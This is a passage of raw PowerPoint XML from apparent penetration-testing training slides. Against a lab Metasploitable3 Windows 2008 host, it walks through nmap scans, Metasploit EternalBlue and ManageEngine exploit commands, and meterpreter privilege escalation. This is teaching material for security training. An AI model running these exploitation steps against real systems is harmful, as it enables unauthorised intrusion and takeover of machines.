              <a:t>Run port scan against the target with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ( # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 192.168.31.15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> script to scan vulnerability associated with SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –p 445 –script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-vuln-* 192.168.31.15 / # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –script vuln 192.168.31.15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search the exploit ( # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; search ms17-010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select the exploit ( # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> &gt; use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/ms17_010_eternalblue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Set target ( # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>&gt; set RHOSTS 192.168.31.15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Run the exploit (#  &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2679230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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Exploitation Demo -2 (Metasploitable3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Manage engine desktop central 9 has RCE vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here in this demo, we have our vulnerable machine metasploitable3 windows server 2008. Which is vulnerable for this exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE29E8A-7695-FAF9-47C8-E66D799BC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1668705" y="3221813"/>
            <a:ext cx="9151695" cy="2645587"/>
            <a:chOff x="-26" y="2093276"/>
            <a:chExt cx="9151695" cy="2645587"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{369DD569-D054-ABEA-4EBD-D4A8A68586D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="4838" t="6194" r="11032" b="3704"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1001063" y="3803073"/>
              <a:ext cx="1310665" cy="935790"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F060482-BCB1-FF4F-FA36-C20C8AE64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377" y="3105090"/>
              <a:ext cx="948264" cy="895874"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A2BB18-8934-137F-0A70-22D847B72C6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect b="25140"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3768436" y="2093276"/>
              <a:ext cx="1114048" cy="891714"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Elbow Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F18BE167-796D-94E1-3E00-BCFB4B727A2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2311728" y="2837851"/>
              <a:ext cx="1546763" cy="965222"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">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21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96E6A43-0288-A913-3721-F9EFAFCC6EF5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4821382" y="2837851"/>
              <a:ext cx="2479963" cy="570367"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">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AC4F9AE-F159-905F-BED1-7806B39449CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-26" y="4060733"/>
              <a:ext cx="1104826" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Attacker’s</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Machine </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" cap="none" spc="0" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="6E747A">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBBC4B0A-50A1-D9F7-F152-F9BFF4EB2BC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7381870" y="2267944"/>
              <a:ext cx="1769799" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Vulnerable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Metasploitable-3 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" cap="none" spc="0" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Win-2008R2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="903702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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Initial Food Hold</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack execution steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run port scan against the target with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ( # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –p- 192.168.31.15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analysis the vulnerability in internet (exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search the exploit ( # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; manage engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select the exploit ( # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> &gt; use exploit/windows/http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>manageengine_connectionid_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Set target ( # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>&gt; set RHOSTS 192.168.31.15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Run the exploit (#  &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3089487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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege escalation is one of the primary objectives in any exploit. It allows the attacker to gain control, access/change sensitive files, and leave permanent backdoors. During a pen test, you will rarely get administrative access to a target system on your first attempt. You'll need to find a way to elevate your access to administrator, and then (hopefully) SYSTEM level.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In addition to kernel-specific exploits, there are other types of exploits that can elevate privilege. They take advantage of services, drivers, and applications running in SYSTEM or administrator privilege. Like the kernel exploits, most are run locally after you have gained access to the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1921262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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are two types of privilege escalation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vertical Privilege Escalation  ( Low level user to high level [non-root &gt;&gt; root])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Horizontal Privilege Escalation ( Same privileged one user to another user)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> we have one post-exploit module for privilege escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> first background the low level session </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> &gt; background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75252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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For privilege Escalation, we run following instruction form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
